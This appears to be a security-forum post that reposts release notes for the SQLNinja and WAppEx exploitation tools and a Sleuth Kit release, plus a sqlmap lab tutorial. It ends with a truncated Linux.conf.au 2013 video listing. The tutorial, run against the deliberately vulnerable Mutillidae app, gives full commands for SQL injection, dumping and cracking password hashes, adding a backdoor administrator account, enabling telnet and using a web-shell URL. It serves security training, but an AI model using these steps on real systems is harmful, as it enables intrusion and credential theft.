Nytro

[h=1]SQLNinja 0.2.999-alpha1[/h]by Mayuresh on February 6, 2013 We finally have a SQLNinja update! We first covered the awesome tool here! We now have SQLNinja version 0.2.999-alpha1! This is the first alpha of the new release, with all the newest cool stuff like data extraction via WAITFOR and DNS tunnel, plus vbscript-based upload! Sqlninja is an exploitation tool to be used against web apps based on MS SQL Server that are vulnerable to SQL Injection attacks, in order to get a shell also in very hostile conditions. Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.” [h=2]Change log for SQLNinja 0.2.999-alpha1:[/h] Added data extraction module Added vbscript-based upload Split big ugly script into modules Lots of refactoring [h=3]Download SQLNinja 0.2.999-alpha1:[/h] SQLNinja 0.2.999-alpha1 – sqlninja-0.2.999-alpha1.tgz 0.2.999-alpha1 Sursa: SQLNinja version 0.2.999-alpha1! — PenTestIT

[h=1]WAppEx 2.0![/h]by Mayuresh on February 6, 2013 Our first post about WAppEx can be found here. Recently, an update – WAppEx 2.0 was made available! This release is a huge leap from the previous one (version 1.0) and as such has been given a major version increment. It is nothing short of a total remake of the whole software! In favour of greater extensibility and flexibility WAppEx 2.0 has all the exploitation logic moved to a core exploit database. The full-fledged exploit database not only provides the good old exploits with a lot of new features, but also stands for sharing, updating, extending and more. The database is rich with new payloads, and major improvements have been made to the existing payloads and exploits. Now you can unleash massive security tests by executing a batch test of multiple exploits against multiple targets; all in one single action. The Test-on-Targets feature automates much of the tasks you would have to do manually in the previous version. Still in addition to all this, a shining toolbox of new tools has been added to the suite. Some of the new tools added are Manual Request, Dork Finder, Exploit Editor, Hidden File Checker, and Neighbor Site Finder! “WAppEx is an integrated Web Application security assessment and exploitation platform designed with the whole spectrum of security professionals to web application hobbyists in mind. It suggests a security assessment model which revolves around an extensible exploit database. Further, it complements the power with various tools required to perform all stages of a web application attack.” [h=2]Changes made to WAppEx 2.0:[/h] Auto-detect feature deleted from exploits Browser tool deleted Exploits and payloads view changed Exploit Database with the following features added: New script syntax and structure Searching, selecting, and executing of exploits. Add/remove database entries (exploits or payloads) Add exploits or payloads to the database using either the Exploit Wizard or the script file Batch testing of multiple targets against multiple exploits Execute multiple instances of one or more payloads (for every running exploit) simultaneously. Following tools added: Manual Request Dork Finder Exploit Editor Hidden File Checker Neighbor Site Finder [*]Local File Inclusion analyzer script updated [*]24 new payloads for LFI, RFI, and PHP Code Execution vulnerabilities added: Directory Explorer CodeExec Bind 3 connect-back shells Code Execution MySQL Dump ServerInfo 4 command execution payloads [*]Bug-fixes: Find Login Page crashed on start Problem with software registration Stop button did not work when retrieving data from SQL server Problem with saving SQL results Crashed when closing Find Login Page Status icons were not displayed properly in exploit tabs [h=3]Download WAppEx:[/h] WAppEX 2.0 – WAppEx2.0.exe Sursa: WAppEx version 2.0! — PenTestIT

[h=1]Sleuth Kit 4.0.2![/h]by Mayuresh on February 6, 2013 Two days ago, The Sleuth Kit was updated! We now have The Sleuth Kit version 4.0.2. Our first post about The Sleuth Kit or TSK can be found here. This release has bug fixes and some new minor features. “The Sleuth Kit (TSK) is a library and collection of command line tools that allow you to investigate volume and file system data. It is a collection of open source file system forensics tools that allow one to view allocated and deleted data from NTFS, FAT, FFS, and EXT2FS images. The Autopsy Forensic Browser provides a graphical interface to The Sleuth Kit. The Sleuth Kit is an open source forensic toolkit for analyzing Microsoft and UNIX file systems and disks. The Sleuth Kit enables investigators to identify and recover evidence from images acquired during incident response or from live systems. The Sleuth Kit is open source, which allows investigators to verify the actions of the tool or customize it to specific needs.“ [h=2]Official change log for The Sleuth Kit:[/h] New Features in Core: fiwalk is now included. Bug Fixes in Core: Fixed fcat to work on NTFS files (still doesn’t support ADS though). Fixed HFS+ support in tsk_loaddb / SQLite — root directory was not added. NTFS code now looks at all MFT entries when listing directory contents. It used to only look at unallocated entries for orphan files. This fixes an image that had allocated files missing from the directory b-tree. NTFS code uses sequence number when searching MFT entries for all files. Libewf detection code change to support v2 API more reliably (ID: 3596212). NTFS $SII code could crash in rare cases if $SDS was multiple of block size. Framework: Added new API to TskImgDB that returns the base name of an image. Numerous performance improvements to framework. Removed requirement in framework to specify module extension in pipeline configuration file. Added blackboard artifacts to represent both operating system and network service user accounts. Java Bindings: More methods to query files Methods to get current directory when being added to DB. Modified class structure a bit More lazy loading for children / parents. Better exception throwing from C++ [h=3]Download The Sleuth Kit:[/h] The Sleuth Kit 4.0.2 – sleuthkit-win32-4.0.2.zip/sleuthkit-framework-win32-4.0.2.zip/sleuthkit-4.0.2.tar.gz Sursa: The Sleuth Kit 4.0.2! — PenTestIT

+ Java SE Proof Of Concept Code ? Packet Storm

[h=1]Video Tutorial: Basics of using sqlmap automated sql injection audit tool[/h]Posted by webpwnized in Information Security on Feb 6, 2013 6:01:03 AM Author: Jeremy Druin Twitter: @webpwnized YouTube Channel: webpwnized's channel - YouTube Software required: Backtrack 5 R3 with sqlmap, Mutillidae Web Pen Test Training Environment (hxxp://sourceforge.net/projects/mutillidae/files/mutillidae-project/) ecorded at the ISSA Kentuckiana February 2013 Workshop, this video review the use of sqlmap; an automated sql injection audit tool. The video walks through using sqlmap to locate an sql injection, determine the backend database type, enumerate the database account, databases, schema, tables, columns and password hashes, then use the database to compromise the windows host. Dumping data, arguably the primary use of sqlmap, is covered only briefly since there is large amounts of documentation on this feature already. Environment The environment is a Backtrack 5 R3 "attacker" at IP 192.168.56.101 and a Windows XP "victim" at 192.168.56.102 running as virtual machines on Oracle VirtualBox. The Windows XP host is running XAMPP on which Mutillidae is installed. Mutillidae may also be installed on WAMPP or LAMP stacks including being able to be installed on Linux. Using two hosts is not neccesary to recreate the lab exercise. All of the items can be reproduced on "localhost". The database was created by installing XAMPP, unzipping the Mutillidae files into the C:\xampp\htdocs\ directory, then clicking the "Set up database" button in Mutillidae. Mutillidae has a deliberately vulnerable login page against which the sql injection was carried out. Notes from Presentation Please find notes from the talk below which can be used to follow along with the video. -------------------------------------------------- Running SQLMAP Help -------------------------------------------------- --help Help -hh Double the help -------------------------------------------------- Running SQLMAP "Manually" -------------------------------------------------- ./sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner -------------------------------------------------- Capturing Request To Pass To SQLMAP -------------------------------------------------- URL: http://192.168.56.102/mutillidae/index.php?page=login.php Request: POST /mutillidae/index.php?page=login.php HTTP/1.1 Host: 192.168.56.102 User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.56.102/mutillidae/index.php?page=login.php Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4 Content-Type: application/x-www-form-urlencoded Content-Length: 57 username=asdf&password=asdf&login-php-submit-button=Login -------------------------------------------------- Running SQLMAP with "auto-parse" -------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options> -------------------------------------------------- Running SQLMAP with various features -------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options> --banner web server operating system: Windows web application technology: PHP 5.4.4, Apache 2.4.2 back-end DBMS: MySQL 5.0 banner: '5.5.25a' --fingerprint web server operating system: Windows web application technology: PHP 5.4.4, Apache 2.4.2 back-end DBMS: active fingerprint: MySQL >= 5.5.0 --current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --hostname Retrieve DBMS server hostname --is-dba Detect if the DBMS current user is DBA current user: 'root@localhost' current database: 'nowasp' current user is DBA: True hostname: 'mutillid-7se1xr' --users Enumerate DBMS users --passwords Enumerate DBMS users password hashes database management system users [*] ''@'localhost' [*] 'pma'@'localhost' [*] 'root'@'linux' [*] 'root'@'localhost' --dbs Enumerate DBMS databases available databases[10]: [*] cdcol [*] information_schema [*] mysql [*] nowasp [*] owasp10 [*] owasp13 [*] performance_schema [*] phpmyadmin [*] test [*] webauth -------------------------------------------------------------------------------- -------------------- Enumerate DBMS database tables, columns, structure (schema) -------------------------------------------------------------------------------- -------------------- --tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --count Retrieve number of entries for table(s) --exclude-sysdbs Exclude DBMS system databases when enumerating tables -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate -------------------------------------------------- Extracting data -------------------------------------------------- --dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell -------------------------------------------------- Listing columns from tables -------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --common-columns ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select column_name from information_schema.columns where table_name = 'user'" select column_name from information_schema.columns where table_name = 'user' [42]: [*] Alter_priv [*] Alter_routine_priv [*] authentication_string [*] Create_priv [*] Create_routine_priv [*] Create_tablespace_priv [*] Create_tmp_table_priv [*] Create_user_priv [*] Create_view_priv [*] Delete_priv [*] Drop_priv [*] Event_priv [*] Execute_priv [*] File_priv [*] Grant_priv [*] Host [*] Index_priv [*] Insert_priv [*] Lock_tables_priv [*] max_connections [*] max_questions [*] max_updates [*] max_user_connections [*] Password [*] plugin [*] Process_priv [*] References_priv [*] Reload_priv [*] Repl_client_priv [*] Repl_slave_priv [*] Select_priv [*] Show_db_priv [*] Show_view_priv [*] Shutdown_priv [*] ssl_cipher [*] ssl_type [*] Super_priv [*] Trigger_priv [*] Update_priv [*] User [*] x509_issuer [*] x509_subject -------------------------------------------------- Advanced: Modifying injections -------------------------------------------------- SELECT * FROM accounts WHERE username='' AND password=''' ./sqlmap.py -r ~/engagements/sqlmap/login.php.request --prefix="SELECT * FROM accounts WHERE username='" --suffix="'-- " --banner --prefix=PREFIX Injection payload prefix string --suffix=SUFFIX Injection payload suffix string -------------------------------------------------- Advanced: Dealing with inconsistent results -------------------------------------------------- select User, Password from mysql.user versus ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select User, Password from mysql.user order by User desc" select User, Password from mysql.user order by User desc select User, Password, Host, authentication_string from mysql.user order by User desc [9]: [*] root, , localhost, [*] root, , linux, [*] pma, , localhost, [*] Simba, *F43B942A34347297C3B0455DAB190AFB9BBF13B5, localhost, [*] Rocky, *2BA8DF85753BE61F6C72A8784B11E68A41878032, localhost, [*] Patches, *2027D9391E714343187E07ACB41AE8925F30737E, localhost, [*] Happy, *160E7D8EE3A97BED0F0AD1563BFB619178D15D7B, localhost, [*] , , localhost, [*] , , linux, -------------------------------------------------- Cracking MySQL Password Hashes -------------------------------------------------- John the Ripper Command Line /pentest/passwords/john/john --format=mysql-sha1 /tmp/mysql.hashes Password Hashes in MySQL Format Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5 Rocky:*2BA8DF85753BE61F6C72A8784B11E68A41878032 Patches:*2027D9391E714343187E07ACB41AE8925F30737E Happy:*160E7D8EE3A97BED0F0AD1563BFB619178D15D7B -------------------------------------------------- Understanding sqlmap O/S Shell -------------------------------------------------- View transaction: tcpdump -i eth1 -vvv -X 1st Stage Uploader 2nd Stage Command Shell Page sc query state= all sc query tlntsvr sc config tlntsvr start= demand sc start tlntsvr net user root toor /add net localgroup TelnetClients /add net localgroup Administrators root /add net localgroup TelnetClients root /add netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101 -------------------------------------------------- Interacting Directly with sqlmap O/S Shell Backdoor -------------------------------------------------- http://192.168.56.102/<temp file name>?cmd=ping%20192.168.56.101 -------------------------------------------------- Direct connection to the database -------------------------------------------------- Installing Py-MySQL Dependency git clone https://github.com/petehunt/PyMySQL/ cd PyMySQL python setup.py install cd .. rm -rf PyMySQL ./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10 Sursa: https://community.rapid7.com/community/infosec/blog/2013/02/06/video-tutorial-basics-of-using-sqlmap-automated-sql-injection-audit-tool

Linux.conf.au 2013 Videos We've released these videos as quickly as possible so that people can enjoy the many great talks at LCA this year, and so we can get our rendering gear out of the venue. We know some of these may have problems, but most of them are working and tested. Please let us know if there's anything that is mistitled, short or otherwise incorrect and we'll deal with it as soon as possible. Helpful debugging information: if the closing screen (the balloons over old Parliament House) doesn't show at the end of the talk, then the file was partly rendered but the render machine probably locked up. If the closing screen shows but the talk was incomplete, then some parts of the talk may be missing, or we might simply have mistakenly unselected one of the raw video files. The former case is easily recoverable; the latter may be impossible to fix without a time machine but may also be recoverable. Let us know either way Things we can't fix: Sir Tim Berners-Lee's keynote on Friday and DSD and Open Source on Wednesday. We don't have permission to record the video for those talks. Sorry, if you weren't there, you've missed it Videos we know have problems: Bdale Garbee's Keynote on Monday - missing. Unfortunately our video capture system failed on us and we captured this on four DV tapes. I've got the 32GB of video of this on a hard disk, and I've cut together a full video in PiTiVi but it seems to refuse to render it. I will be trying Cinelerra to see if that works, or if restarting my PiTiVi project from scratch fixes it. This is a long job and will have to wait for the moment - Paul, 5/2/13. Miniconf videos. These were captured and are on file but the schedule in the video processing system is out of date. I'm going to try importing the latest schedule and seeing if that fixes it without also breaking every other talk. If not, I'll recreate the schedule by hand - Paul, 5/2/13. Ain't No Party Like A Unix Party - mislabeled talk (thanks Tim Suess). Daniel Black notes that this might be mislabeled as 'Touch And Go - Modern User Interfaces Using Open Source. This is probably a schedule mismatch and hopefully an easy fix - Paul, 5/2/13. Why Kernel space sucks - audio drops at end (thanks Neil Brown). This is probably unrecoverable but I'll review it - Paul, 5/2/13. Bufferbloat from a Plumber's point of viewi (mp4) - only the end of the talk (thanks Dave Taht and Andrew McDonnell). This may be a missing or incorrectly skipped DV file - will review - Paul, 5/2/13. The future of nonvolatile memory (ogv) - truncated (thanks Neil Brown). Probably one of the render nodes locked up during rendering - will re-render - Paul, 5/2/13. High Speed Data Acquisition - missing (thanks Andrew McDonnell). I know we have this talk, I'm just not sure why it hasn't been rendered - will fix - Paul, 5/2/13. Copyright's Dark Clouds - Optus v NRL (ogv), Free and Open Source Software and Activism (ogv), Openstack on Openstack - a single management API for all your servers (ogv and mp4), and Using open source in over 1100 schools in New Zealand (ogv) - all truncated (thanks Ambrose Andrews, Robert Collins and Daniel Bryant). These are definitely rendering errors and we'll rebuild them - Paul, 5/2/13. The IPocalypse 20 months later (mp4) and RealTime Response on Multicore Systems - It is bigger than I thought (mp4) - both shorter than expected (thanks Ashley Hull). Probably render node failure, will reprocess - Paul, 5/2/13. Linux Gaming At Last - Tuning Open Source Graphics Drivers for Valve Software (ogv) - seems to skip at about 0:12:39 and resolve the problem soon after (thanks Phil Ingram). This may have been a rendering issue, will reprocess to try and fix it - Paul, 6/2/13. Thanks to everyone who's reported problems - it's not a perfect system, but check back here after Wednesday 6th February for updates. The overall response to getting the videos up quickly rather than perfectly has been very positive - thanks for your support! Paul Wayper, AV Wrangler [TABLE] [TR] [TD][/TD] [TD]Parent Directory[/TD] [TD] [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]3D_Printing_with_Repsnapper.mp4[/TD] [TD=align: right]02-Feb-2013 18:00 [/TD] [TD=align: right] 88M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]15MW_and_3600_penguins_in_a_room_Supercomputing_at_ANU.mp4[/TD] [TD=align: right]03-Feb-2013 17:42 [/TD] [TD=align: right] 91M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]A_New_Linux_Platform_Hardware_and_Software.mp4[/TD] [TD=align: right]03-Feb-2013 16:55 [/TD] [TD=align: right] 81M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]After_Arduino.mp4[/TD] [TD=align: right]04-Feb-2013 10:13 [/TD] [TD=align: right] 66M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]An_Introduction_to_Linux_IPC_Facilities.mp4[/TD] [TD=align: right]03-Feb-2013 12:21 [/TD] [TD=align: right]260M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ArduSat_Open_Source_in_orbit.mp4[/TD] [TD=align: right]02-Feb-2013 19:21 [/TD] [TD=align: right] 86M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Beyond_Alt_Text_What_Every_Project_Should_Know_About_Accessibility.mp4[/TD] [TD=align: right]04-Feb-2013 09:45 [/TD] [TD=align: right] 58M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Big_and_Little_Endian_inside_out.mp4[/TD] [TD=align: right]04-Feb-2013 10:25 [/TD] [TD=align: right]112M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Bufferbloat_from_a_Plumbers_point_of_view.mp4[/TD] [TD=align: right]02-Feb-2013 17:46 [/TD] [TD=align: right]7.6M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Building_Persona_federated_and_privacysensitive_identity_for_the_Web.mp4[/TD] [TD=align: right]03-Feb-2013 17:41 [/TD] [TD=align: right] 23M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Building_a_free_software_telemetry_radio_system.mp4[/TD] [TD=align: right]02-Feb-2013 21:05 [/TD] [TD=align: right] 63M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ceph_Managing_A_Distributed_Storage_System_At_Scale.mp4[/TD] [TD=align: right]03-Feb-2013 17:42 [/TD] [TD=align: right] 81M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ceph_object_storage_block_storage_file_system_replication_massive_scalability_and_then_some.mp4[/TD] [TD=align: right]03-Feb-2013 16:18 [/TD] [TD=align: right]155M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Checkpoint_and_Restore_are_we_there_yet.mp4[/TD] [TD=align: right]02-Feb-2013 18:51 [/TD] [TD=align: right] 48M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Code_up_your_own_video_conference_in_HTML5.mp4[/TD] [TD=align: right]02-Feb-2013 19:08 [/TD] [TD=align: right] 66M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Concurrent_Programming_with_the_Disruptor.mp4[/TD] [TD=align: right]02-Feb-2013 20:05 [/TD] [TD=align: right] 54M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Conference_Closing.mp4[/TD] [TD=align: right]03-Feb-2013 17:35 [/TD] [TD=align: right]210M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Conference_Closing_Lightning_Talks.mp4[/TD] [TD=align: right]03-Feb-2013 17:20 [/TD] [TD=align: right]124M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Copyrights_Dark_Clouds_Optus_v_NRL.mp4[/TD] [TD=align: right]02-Feb-2013 19:11 [/TD] [TD=align: right]3.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Designing_a_Verifiable_and_Accessible_Electronic_Voting_System.mp4[/TD] [TD=align: right]02-Feb-2013 20:07 [/TD] [TD=align: right]2.5M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Droids_that_talk_Pairing_Codec2_and_Android.mp4[/TD] [TD=align: right]04-Feb-2013 13:20 [/TD] [TD=align: right] 31M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Free_and_open_source_software_and_activism.mp4[/TD] [TD=align: right]04-Feb-2013 13:10 [/TD] [TD=align: right]167K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Future_directions_for_the_X_Window_System.mp4[/TD] [TD=align: right]04-Feb-2013 09:45 [/TD] [TD=align: right] 87M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Geeks_rule_over_kings_the_Distributed_Democracy.mp4[/TD] [TD=align: right]02-Feb-2013 19:20 [/TD] [TD=align: right]3.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Getting_older_Tips_tricks_for_designing_inclusive_open_source_user_interfaces.mp4[/TD] [TD=align: right]02-Feb-2013 18:48 [/TD] [TD=align: right] 31M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Git_For_Ages_4_And_Up.mp4[/TD] [TD=align: right]02-Feb-2013 22:52 [/TD] [TD=align: right]342M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Git_not_just_for_source_code_anymore.mp4[/TD] [TD=align: right]02-Feb-2013 20:29 [/TD] [TD=align: right] 74M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Graphics_from_Gamepads_Guitars_and_Gadgets_Galore.mp4[/TD] [TD=align: right]03-Feb-2013 18:12 [/TD] [TD=align: right] 83M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]HEADER.html[/TD] [TD=align: right]06-Feb-2013 11:05 [/TD] [TD=align: right]4.4K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Heat_Orchestrating_multiple_cloud_applications_on_OpenStack_using_templates.mp4[/TD] [TD=align: right]03-Feb-2013 16:38 [/TD] [TD=align: right] 87M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_Mozilla_draws_the_line_between_configuration_and_data_while_using_configuration_management_tools.mp4[/TD] [TD=align: right]04-Feb-2013 09:27 [/TD] [TD=align: right] 69M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_to_Fix_a_Font.mp4[/TD] [TD=align: right]03-Feb-2013 00:15 [/TD] [TD=align: right] 77M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_to_make_almost_anything_go_faster.mp4[/TD] [TD=align: right]03-Feb-2013 00:02 [/TD] [TD=align: right] 51M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_to_use_Puppet_like_an_Adult.mp4[/TD] [TD=align: right]03-Feb-2013 11:56 [/TD] [TD=align: right] 85M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Keynote_Andrew_Bunnie_Huang.mp4[/TD] [TD=align: right]03-Feb-2013 01:37 [/TD] [TD=align: right] 77M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Keynote_Radia_Perlman.mp4[/TD] [TD=align: right]03-Feb-2013 11:33 [/TD] [TD=align: right]117M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]LTTng_20_Advanced_Linux_tracing_for_everyone.mp4[/TD] [TD=align: right]04-Feb-2013 12:19 [/TD] [TD=align: right] 86M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Lighting_up_OpenCV_with_Ne10_and_NEON.mp4[/TD] [TD=align: right]04-Feb-2013 09:34 [/TD] [TD=align: right] 56M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Linux_Gaming_at_Last_Tuning_Open_Source_Graphics_Drivers_for_Valve_Software.mp4[/TD] [TD=align: right]02-Feb-2013 20:19 [/TD] [TD=align: right] 35M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Main_conference_opening.mp4[/TD] [TD=align: right]02-Feb-2013 17:57 [/TD] [TD=align: right] 84M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Make_your_software_understand_your_nonUS_accent.mp4[/TD] [TD=align: right]02-Feb-2013 19:08 [/TD] [TD=align: right] 58M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Making_Mobile_Communications_Secure.mp4[/TD] [TD=align: right]04-Feb-2013 11:05 [/TD] [TD=align: right]116M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Making_RCU_Respect_Your_Devices_Battery_Lifetime.mp4[/TD] [TD=align: right]02-Feb-2013 19:34 [/TD] [TD=align: right] 71M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Making_UEFI_Secure_boot_work_for_you.mp4[/TD] [TD=align: right]02-Feb-2013 21:02 [/TD] [TD=align: right] 79M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Maximum_Clojure_Performance.mp4[/TD] [TD=align: right]02-Feb-2013 21:04 [/TD] [TD=align: right] 71M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Measuring_and_Improving_OpenGL_Performance.mp4[/TD] [TD=align: right]02-Feb-2013 22:03 [/TD] [TD=align: right] 59M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]MySQL_in_the_cloud_as_a_service.mp4[/TD] [TD=align: right]03-Feb-2013 17:17 [/TD] [TD=align: right]166M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]NetFPGA_USB_2_interface.mp4[/TD] [TD=align: right]02-Feb-2013 22:40 [/TD] [TD=align: right]148M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]NovaProva_or_How_I_Did_Six_Impossible_Things_Before_LCA.mp4[/TD] [TD=align: right]03-Feb-2013 16:41 [/TD] [TD=align: right] 97M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]OWASP_Developer_Guide_2013_what_it_means_for_open_source_projects.mp4[/TD] [TD=align: right]04-Feb-2013 12:24 [/TD] [TD=align: right] 81M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]OpenStack_Zuul.mp4[/TD] [TD=align: right]04-Feb-2013 09:53 [/TD] [TD=align: right] 78M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_Digital_Radio.mp4[/TD] [TD=align: right]03-Feb-2013 00:06 [/TD] [TD=align: right] 79M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_Firmware.mp4[/TD] [TD=align: right]04-Feb-2013 13:05 [/TD] [TD=align: right] 47M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_and_Open_Data_for_Humanitarian_Response_with_OpenStreetMap.mp4[/TD] [TD=align: right]03-Feb-2013 00:03 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Openstack_on_Openstack_a_single_management_API_for_all_your_servers.mp4[/TD] [TD=align: right]04-Feb-2013 09:17 [/TD] [TD=align: right]1.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Playing_with_OpenStack_Swift.mp4[/TD] [TD=align: right]03-Feb-2013 11:57 [/TD] [TD=align: right] 95M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ponies_and_Rainbows_Clutter_20_and_GTK_40.mp4[/TD] [TD=align: right]03-Feb-2013 17:44 [/TD] [TD=align: right]106M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]PostgreSQL_92_Full_Throttle_Database.mp4[/TD] [TD=align: right]03-Feb-2013 16:09 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Pre_dinner_thingy_robert_llewellyn_and_simon_hackett.mp4[/TD] [TD=align: right]03-Feb-2013 16:42 [/TD] [TD=align: right] 93M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Quantitative_community_management.mp4[/TD] [TD=align: right]03-Feb-2013 16:07 [/TD] [TD=align: right] 99M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Quiltwork_patch_deployment_in_nz_and_au.mp4[/TD] [TD=align: right]02-Feb-2013 23:11 [/TD] [TD=align: right] 72M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RAID_is_more_than_parity_and_mirrors.mp4[/TD] [TD=align: right]04-Feb-2013 10:04 [/TD] [TD=align: right]122M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]REPENT_FOR_THE_END_OF_THE_UNIX_EPOCH_IS_NIGH.mp4[/TD] [TD=align: right]02-Feb-2013 20:19 [/TD] [TD=align: right] 74M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RealTime_Response_on_Multicore_Systems_It_Is_Bigger_Than_I_Thought.mp4[/TD] [TD=align: right]02-Feb-2013 19:12 [/TD] [TD=align: right] 23M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Rethinking_CPU_hotplug_for_elegance_and_efficiency.mp4[/TD] [TD=align: right]02-Feb-2013 20:04 [/TD] [TD=align: right] 90M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ript_a_terse_but_expressive_DSL_for_iptables.mp4[/TD] [TD=align: right]02-Feb-2013 21:40 [/TD] [TD=align: right] 68M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ristretto_runtime_types_for_JavaScript.mp4[/TD] [TD=align: right]03-Feb-2013 17:00 [/TD] [TD=align: right] 83M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Scratching_your_own_itch_subsurface_diving_log.mp4[/TD] [TD=align: right]03-Feb-2013 15:24 [/TD] [TD=align: right]118M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Shell_for_Starters.mp4[/TD] [TD=align: right]04-Feb-2013 12:09 [/TD] [TD=align: right]135M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Software_Transactional_Memory_in_GCC_47.mp4[/TD] [TD=align: 